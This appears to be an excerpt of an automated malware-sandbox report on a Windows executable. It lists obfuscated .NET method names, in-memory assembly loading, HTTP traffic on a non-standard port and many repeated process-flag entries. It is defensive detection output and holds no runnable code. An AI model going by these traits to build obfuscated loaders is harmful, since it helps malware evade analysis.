                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.cs.Net Code: jVNRG9d43l System.Reflection.Assembly.Load(byte[])
                      Source: lWnSA7IyVc.exeStatic PE information: section name: .text entropy: 7.7812990489221505
                      Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, VsPtLqRMytadQ9l4MR.csHigh entropy of concatenated method names: 'ok0289F7EW', 'Ss42a81SYW', 'BqA29N8fhF', 'wYU2kIGUJ7', 'jtH2v2xZJQ', 'c0G2cjDttD', 'e4uXGX4RgGatVBl1Jq', 'KKLMSZsWEnCqiaevhM', 'aCL22iUiGw', 'UZB2gMHiW6'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, aJQI0GBjDttDxfoH5X.csHigh entropy of concatenated method names: 'jtjpnjMtii', 'iaUp0T3HX0', 'WVQp3chJ9h', 'lxep8r21xV', 'YcPpa0Zw44', 'CZ13s3Np12', 'Rog31dc5ri', 'h5Y3tjhbbh', 'O2a3T4hVU1', 'Ulk3Wp9nsn'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, b6u3aYzhhBXOqZ6a4R.csHigh entropy of concatenated method names: 'gNeOeq4psF', 'pkcOXc7JII', 'RofOmBaV0S', 'dOjOB71Gfc', 'IapOwW1XPu', 'quhOYg1Jf6', 'ohLOF1VQgb', 'OHQOHA3DDZ', 'EEXON2tIgp', 'iu9O6hiYiS'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, zUJ7q7JgFuSt78tH2x.csHigh entropy of concatenated method names: 'fQc3oLEswA', 'mg93PODNf4', 'nrLiEglYqQ', 'i9miYVHHl0', 'TF4iFuCBly', 'SfriuQNWve', 'ahJiSHVlue', 'oAsiUmF3AD', 'ulkiKZD3mW', 'h9wifCjXqk'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, ggpxgV22UfmQin6KbTQ.csHigh entropy of concatenated method names: 'y8hOqkX3pC', 'i2OOzsKy1R', 'YGIyZiAjj6', 'BXdy2VkUbk', 'FLvyIY5AdM', 'dYaygtYPWW', 'hKxyRoieU4', 'RshynjHhEd', 'DbFylmZhVv', 'cpBy05R28O'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, tleP4YIiwJqF027VDX.csHigh entropy of concatenated method names: 'gfUGZ976C', 'nW5DpvvxW', 'PeHeNtE0i', 'I8GPyEnsW', 'HX7mJflgI', 'kQUJSswCc', 'HK6wNltgJW8dRsMACk', 'uI1ePGRPylRNDgU9wN', 'S3V4xYhGq', 'KZ6OjHECV'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, KpXSP7a4XKGwMYNe9W.csHigh entropy of concatenated method names: 'Vd9gntZRh5', 'xluglUonnu', 'wD4g0fUHgH', 'bL2giUbr8O', 'Ylgg3OSfZq', 'KrugpuJkBx', 'tUVg8tVALJ', 'tuSgalS6uW', 'OOpg5RnWug', 'RDng98NZj0'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, HUUmEfVh2jcPCYrDet.csHigh entropy of concatenated method names: 'E1idXJFopS', 'q6Mdmxu0va', 'bC4dBMsCy4', 'UaedwGEZX7', 'kkTdY4QvC8', 'a1IdFV3YoI', 'h44dSW2aNg', 'f4fdUmOaQs', 'A8ndfFu6la', 'plZdxvMY3T'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, JDh1uomqAN8fhF7YUI.csHigh entropy of concatenated method names: 'XnUiDH9FCE', 'VrEiek1NHr', 'uNliXG5CO1', 'Ro5imWEMWJ', 'zrpivdDwq9', 'RATiciYT0F', 'mupiLcJTpK', 'Bv6i42KHi0', 'XP8ijKCDeV', 'YXviOUHxy2'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, JuOaI01AsuEZve1SER.csHigh entropy of concatenated method names: 'hy6LTxugN3', 'WIqLqH8Gae', 'fVU4Z4IBuD', 'DI242jOTVa', 'VU0LxnyHAS', 'W8XLQHiCSf', 'StYLVwBV8R', 'kyXLMVDGZ1', 'rPFLCnD58P', 'kKBLrg8ir5'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, t0nTevAGjsUiVgkmZ0.csHigh entropy of concatenated method names: 'Jn9L9GpbgV', 's9aLkOwitr', 'ToString', 'E0kLlUr4Ke', 'SN7L0dP74R', 'wK5Li2JGR5', 'snZL3hQHrU', 'W2xLpYQYht', 'nEmL8DY2sG', 'dB5LanvpHj'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, g9F7EWXCs481SYWDaY.csHigh entropy of concatenated method names: 'Cvd0Mg4M2S', 'gCm0Cq1d2R', 'LEl0rXvHSO', 'YV50A9clP5', 'jf50sA1dC2', 'enG01W1Tnw', 'J080tTBneW', 'heu0TLxXsI', 'Unt0WRStPP', 'iZo0qh6ERT'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, LHfvEY2R7w7o13anfyU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OXThjrsTWt', 'JWhhOMbv8X', 'QeRhyp4XGD', 'lsmhhCLEpa', 'xUFhbYqyqL', 'pE1h7kQwXm', 'wFjhHWTnKp'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, T5i99LrmMRnLQYweiS.csHigh entropy of concatenated method names: 'ToString', 'qGycxBa6nG', 'N98cwrK4tO', 'BjIcEVRHT7', 'W3JcY82bSu', 'L0gcFU85wQ', 'xKjcunuohO', 'SfPcSwwRAq', 'lJ6cUsZCcG', 'qpAcKD5vmD'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, gLIrIXKHyDWiCRvqAk.csHigh entropy of concatenated method names: 'Lgr8NrQ8dX', 'lMK86D0btM', 'u5e8GwckXI', 'Qt28DR525n', 'AX68ovBOhQ', 'qU38e55Ppo', 'sUs8Peaql5', 'Oqc8X9A5Gx', 'PhE8my1nU3', 'X8R8JTVM97'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, wn0WN32ZDZsP65xpk2y.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P22OxHtqA8', 'BCPOQfN2DZ', 'UX4OVcNLvj', 'awhOMRu5IS', 'cD0OCaaPQS', 'Sj0OrQwaOU', 'NWVOAZ9jVK'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, el1EGB0yXPWDaA8vEl.csHigh entropy of concatenated method names: 'Dispose', 'ThY2W87NHJ', 'SbmIwub90T', 'L9Aq0hJwtR', 'rch2qEv5PA', 'om82z7GvyN', 'ProcessDialogKey', 'VpyIZxyNmp', 'MNSI2y2kmR', 'DF7IIuTo23'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, uxyNmpWUNSy2kmRPF7.csHigh entropy of concatenated method names: 'fHDjBmA4Rm', 'CyKjwis3dY', 'L4gjEXpHTx', 'kZjjYLCXZ6', 'Ep8jFRu3SW', 'VDkju9288B', 'mLxjS3UOVN', 'a33jUFy8ri', 'SGwjKD1sYu', 'kaGjftn002'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, Xx93d2M4px6wCS11mw.csHigh entropy of concatenated method names: 'McAvfX5YsO', 'kN1vQP5Ae8', 'JttvMIgaDE', 'qagvCUFEuG', 'nRYvwPmkCL', 'hmjvENHMix', 'WObvYhsNPC', 'XmlvFf3Itx', 'dwYvuBjZi0', 'TgavSlo2Fa'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, jMKDNQtI1AhY87NHJ4.csHigh entropy of concatenated method names: 'zlUjvVPxcn', 'GPOjLpMcMP', 'GVXjj1ZNvc', 'Svrjyb5yiy', 'Lacjb7QjJT', 'tagjHPqSW9', 'Dispose', 'Gqi4lIcuUe', 'aE9407CcOG', 'xZL4i672Nw'
                      Source: 0.2.lWnSA7IyVc.exe.374fc18.1.raw.unpack, dQYy7NSINxkIPPq6UJ.csHigh entropy of concatenated method names: 'o9v8lQKEfD', 'Vlo8iriJ0e', 'q0H8p8E8gT', 'J4RpqwcmBe', 'B2Mpzk2hPJ', 'fee8ZkNaHG', 'EOq82BNARj', 'aCB8I5bwJK', 'MMJ8gv5Rey', 'c2F8RITfJI'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, VsPtLqRMytadQ9l4MR.csHigh entropy of concatenated method names: 'ok0289F7EW', 'Ss42a81SYW', 'BqA29N8fhF', 'wYU2kIGUJ7', 'jtH2v2xZJQ', 'c0G2cjDttD', 'e4uXGX4RgGatVBl1Jq', 'KKLMSZsWEnCqiaevhM', 'aCL22iUiGw', 'UZB2gMHiW6'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, aJQI0GBjDttDxfoH5X.csHigh entropy of concatenated method names: 'jtjpnjMtii', 'iaUp0T3HX0', 'WVQp3chJ9h', 'lxep8r21xV', 'YcPpa0Zw44', 'CZ13s3Np12', 'Rog31dc5ri', 'h5Y3tjhbbh', 'O2a3T4hVU1', 'Ulk3Wp9nsn'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, b6u3aYzhhBXOqZ6a4R.csHigh entropy of concatenated method names: 'gNeOeq4psF', 'pkcOXc7JII', 'RofOmBaV0S', 'dOjOB71Gfc', 'IapOwW1XPu', 'quhOYg1Jf6', 'ohLOF1VQgb', 'OHQOHA3DDZ', 'EEXON2tIgp', 'iu9O6hiYiS'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, zUJ7q7JgFuSt78tH2x.csHigh entropy of concatenated method names: 'fQc3oLEswA', 'mg93PODNf4', 'nrLiEglYqQ', 'i9miYVHHl0', 'TF4iFuCBly', 'SfriuQNWve', 'ahJiSHVlue', 'oAsiUmF3AD', 'ulkiKZD3mW', 'h9wifCjXqk'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, ggpxgV22UfmQin6KbTQ.csHigh entropy of concatenated method names: 'y8hOqkX3pC', 'i2OOzsKy1R', 'YGIyZiAjj6', 'BXdy2VkUbk', 'FLvyIY5AdM', 'dYaygtYPWW', 'hKxyRoieU4', 'RshynjHhEd', 'DbFylmZhVv', 'cpBy05R28O'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, tleP4YIiwJqF027VDX.csHigh entropy of concatenated method names: 'gfUGZ976C', 'nW5DpvvxW', 'PeHeNtE0i', 'I8GPyEnsW', 'HX7mJflgI', 'kQUJSswCc', 'HK6wNltgJW8dRsMACk', 'uI1ePGRPylRNDgU9wN', 'S3V4xYhGq', 'KZ6OjHECV'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, KpXSP7a4XKGwMYNe9W.csHigh entropy of concatenated method names: 'Vd9gntZRh5', 'xluglUonnu', 'wD4g0fUHgH', 'bL2giUbr8O', 'Ylgg3OSfZq', 'KrugpuJkBx', 'tUVg8tVALJ', 'tuSgalS6uW', 'OOpg5RnWug', 'RDng98NZj0'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, HUUmEfVh2jcPCYrDet.csHigh entropy of concatenated method names: 'E1idXJFopS', 'q6Mdmxu0va', 'bC4dBMsCy4', 'UaedwGEZX7', 'kkTdY4QvC8', 'a1IdFV3YoI', 'h44dSW2aNg', 'f4fdUmOaQs', 'A8ndfFu6la', 'plZdxvMY3T'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, JDh1uomqAN8fhF7YUI.csHigh entropy of concatenated method names: 'XnUiDH9FCE', 'VrEiek1NHr', 'uNliXG5CO1', 'Ro5imWEMWJ', 'zrpivdDwq9', 'RATiciYT0F', 'mupiLcJTpK', 'Bv6i42KHi0', 'XP8ijKCDeV', 'YXviOUHxy2'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, JuOaI01AsuEZve1SER.csHigh entropy of concatenated method names: 'hy6LTxugN3', 'WIqLqH8Gae', 'fVU4Z4IBuD', 'DI242jOTVa', 'VU0LxnyHAS', 'W8XLQHiCSf', 'StYLVwBV8R', 'kyXLMVDGZ1', 'rPFLCnD58P', 'kKBLrg8ir5'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, t0nTevAGjsUiVgkmZ0.csHigh entropy of concatenated method names: 'Jn9L9GpbgV', 's9aLkOwitr', 'ToString', 'E0kLlUr4Ke', 'SN7L0dP74R', 'wK5Li2JGR5', 'snZL3hQHrU', 'W2xLpYQYht', 'nEmL8DY2sG', 'dB5LanvpHj'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, g9F7EWXCs481SYWDaY.csHigh entropy of concatenated method names: 'Cvd0Mg4M2S', 'gCm0Cq1d2R', 'LEl0rXvHSO', 'YV50A9clP5', 'jf50sA1dC2', 'enG01W1Tnw', 'J080tTBneW', 'heu0TLxXsI', 'Unt0WRStPP', 'iZo0qh6ERT'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, LHfvEY2R7w7o13anfyU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OXThjrsTWt', 'JWhhOMbv8X', 'QeRhyp4XGD', 'lsmhhCLEpa', 'xUFhbYqyqL', 'pE1h7kQwXm', 'wFjhHWTnKp'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, T5i99LrmMRnLQYweiS.csHigh entropy of concatenated method names: 'ToString', 'qGycxBa6nG', 'N98cwrK4tO', 'BjIcEVRHT7', 'W3JcY82bSu', 'L0gcFU85wQ', 'xKjcunuohO', 'SfPcSwwRAq', 'lJ6cUsZCcG', 'qpAcKD5vmD'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, gLIrIXKHyDWiCRvqAk.csHigh entropy of concatenated method names: 'Lgr8NrQ8dX', 'lMK86D0btM', 'u5e8GwckXI', 'Qt28DR525n', 'AX68ovBOhQ', 'qU38e55Ppo', 'sUs8Peaql5', 'Oqc8X9A5Gx', 'PhE8my1nU3', 'X8R8JTVM97'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, wn0WN32ZDZsP65xpk2y.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P22OxHtqA8', 'BCPOQfN2DZ', 'UX4OVcNLvj', 'awhOMRu5IS', 'cD0OCaaPQS', 'Sj0OrQwaOU', 'NWVOAZ9jVK'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, el1EGB0yXPWDaA8vEl.csHigh entropy of concatenated method names: 'Dispose', 'ThY2W87NHJ', 'SbmIwub90T', 'L9Aq0hJwtR', 'rch2qEv5PA', 'om82z7GvyN', 'ProcessDialogKey', 'VpyIZxyNmp', 'MNSI2y2kmR', 'DF7IIuTo23'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, uxyNmpWUNSy2kmRPF7.csHigh entropy of concatenated method names: 'fHDjBmA4Rm', 'CyKjwis3dY', 'L4gjEXpHTx', 'kZjjYLCXZ6', 'Ep8jFRu3SW', 'VDkju9288B', 'mLxjS3UOVN', 'a33jUFy8ri', 'SGwjKD1sYu', 'kaGjftn002'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, Xx93d2M4px6wCS11mw.csHigh entropy of concatenated method names: 'McAvfX5YsO', 'kN1vQP5Ae8', 'JttvMIgaDE', 'qagvCUFEuG', 'nRYvwPmkCL', 'hmjvENHMix', 'WObvYhsNPC', 'XmlvFf3Itx', 'dwYvuBjZi0', 'TgavSlo2Fa'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, jMKDNQtI1AhY87NHJ4.csHigh entropy of concatenated method names: 'zlUjvVPxcn', 'GPOjLpMcMP', 'GVXjj1ZNvc', 'Svrjyb5yiy', 'Lacjb7QjJT', 'tagjHPqSW9', 'Dispose', 'Gqi4lIcuUe', 'aE9407CcOG', 'xZL4i672Nw'
                      Source: 0.2.lWnSA7IyVc.exe.73b0000.5.raw.unpack, dQYy7NSINxkIPPq6UJ.csHigh entropy of concatenated method names: 'o9v8lQKEfD', 'Vlo8iriJ0e', 'q0H8p8E8gT', 'J4RpqwcmBe', 'B2Mpzk2hPJ', 'fee8ZkNaHG', 'EOq82BNARj', 'aCB8I5bwJK', 'MMJ8gv5Rey', 'c2F8RITfJI'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
